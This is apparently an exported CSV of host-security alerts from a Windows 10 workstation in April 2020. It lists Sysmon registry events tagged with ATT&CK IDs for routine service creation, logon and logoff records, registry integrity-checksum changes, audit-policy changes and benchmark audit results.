13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.672",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.792603400Z"",""eventRecordID"":""1093"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 13:22:14.659",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.791723500Z"",""eventRecordID"":""1092"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.624",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.790287500Z"",""eventRecordID"":""1091"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.684\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.684"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.684 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 13:22:14.608",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.790075100Z"",""eventRecordID"":""1090"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.684\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.684"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.684 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:12.932",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 13:22:12.658",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:22:09.390",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x382A9 + Linked Logon ID: 0x38239 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:09.374",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38239 + Linked Logon ID: 0x382A9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:07.550",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 13:22:06.732",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:03.669",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 13:21:27.800",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38AED + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. This event can be interpreted as a logoff event.""" +"Apr 24, 2020 @ 13:21:27.017",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:21:27.005",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:21:15.487",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:12Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:21:03.267",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:20:56.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"Apr 24, 2020 @ 13:20:29.739",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 13:20:27.328",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 13:20:26.435",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:23Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:20:25.626",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 13:19:38.103",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 13:19:38.091",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 13:19:30.697",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '1af7f0914012f801bdabc07119bd84db' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +", +"Apr 24, 2020 @ 13:19:29.668",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '185d612f78fce1526ce008c1931abcc6' +New md5sum is : '0d61dacf49c4b7682f45fff7f8f57479' +Old sha1sum was: '7a7004354744dcd7886dc8307a1634cc3a0e059c' +New sha1sum is : '71a31e06fb81f2dcbcdf75c75730b24491f00526' +", +"Apr 24, 2020 @ 13:19:29.651",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '100ead94668944d84b2a1144423fcb73' +New md5sum is : '6ea2dee3d2bb35e8d704d196aedd6a76' +Old sha1sum was: '455e697a971d8f61c574214108cb1d5263461398' +New sha1sum is : '3bf6639fb706c11a88f9ee628fac8040d19fe6e6' +", +"Apr 24, 2020 @ 13:19:28.291",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: '4d6e359f48b4d661879fa30d266022bd' +New md5sum is : '49574a9da5b73510ecb8125c7786d037' +Old sha1sum was: '36dbf8e97699b0ca2ccc6e1503bfdfbfc3494986' +New sha1sum is : 'fc3c9a4be6b806a974693af1dc528845db7631da' +", +"Apr 24, 2020 @ 13:19:25.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:25.869",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:19:25.010",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:18.979",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:18.932",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:19:16.338",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '5de781a93c0a6c5d5144068810a7e1b5' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '09d2f3723a2d55175f72d45ef9f690a25bbba0c6' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +", +"Apr 24, 2020 @ 13:19:16.306",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '29f6279048392e596b289f171bfe2117' +New md5sum is : 'f5e14498d88793ab9e47ba95008e4f35' +Old sha1sum was: 'fb61655b893457d5b89950bcb8e574fb0c2b2ee0' +New sha1sum is : '572aa3d10a303409c35a7f5afc5aaacefa8eabdd' +", +"Apr 24, 2020 @ 13:19:16.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '6802c32dd7e97c204d9b4a5103edb8fd' +New md5sum is : 'bf02f240281a1be47db753d1369bc887' +Old sha1sum was: 'a3026a7f639946e032b0592d9980b64bf802ba17' +New sha1sum is : '7f27010184bfe5915bac77ef2d4b82c97b694471' +", +"Apr 24, 2020 @ 13:19:15.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '711af8bef5843e2b181a65e02f7ec4e7' +New md5sum is : '92492b6125d7a64a6c867269318db81a' +Old sha1sum was: '38360c17547cafecdf62b6be07a2e1aff8bca9dd' +New sha1sum is : '95e95e5c4e1f969e302d45ad055d83e5811ca397' +", +"Apr 24, 2020 @ 13:19:13.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +New md5sum is : '64365e10e79becaacc4b6257a583c30a' +Old sha1sum was: 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +New sha1sum is : '18c33905fecebf510aa8a907616f86a31385ab5e' +", +"Apr 24, 2020 @ 13:19:13.720",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'bd63601b6f69031fc9053f7f5e9994b3' +New md5sum is : '68ac86b26a245d900a16ed993efba173' +Old sha1sum was: '8919a69432dd58f4818fdb4b7f15495900ea20ed' +New sha1sum is : 'b452118250c6d9b0aa3e8f42e324a861d6b04637' +", +"Apr 24, 2020 @ 13:19:13.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:13.416",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:19:12.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'aca2086634cad666bcfa5ce02c60723b' +New md5sum is : '4167ad01062b429fe5857a5a6dc703af' +Old sha1sum was: '01964f5117f31b451d06a4b44965af64482e8693' +New sha1sum is : '6d8722863bf5d41401f409cf8aa35ab5ed1125bb' +", +"Apr 24, 2020 @ 13:19:12.667",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '671fdf6ae1d3621c0a477079b6ab0354' +New md5sum is : 'a3a2750b960ee36c1bb74f83dab7d8c6' +Old sha1sum was: '14ea7fe43e6e733427540b1d51575677cb5e4c70' +New sha1sum is : 'a36891877a9c4b74bf2bed979ea687633c20cc43' +", +"Apr 24, 2020 @ 13:19:12.228",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:12.216",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3f13d\Security' was added. +", 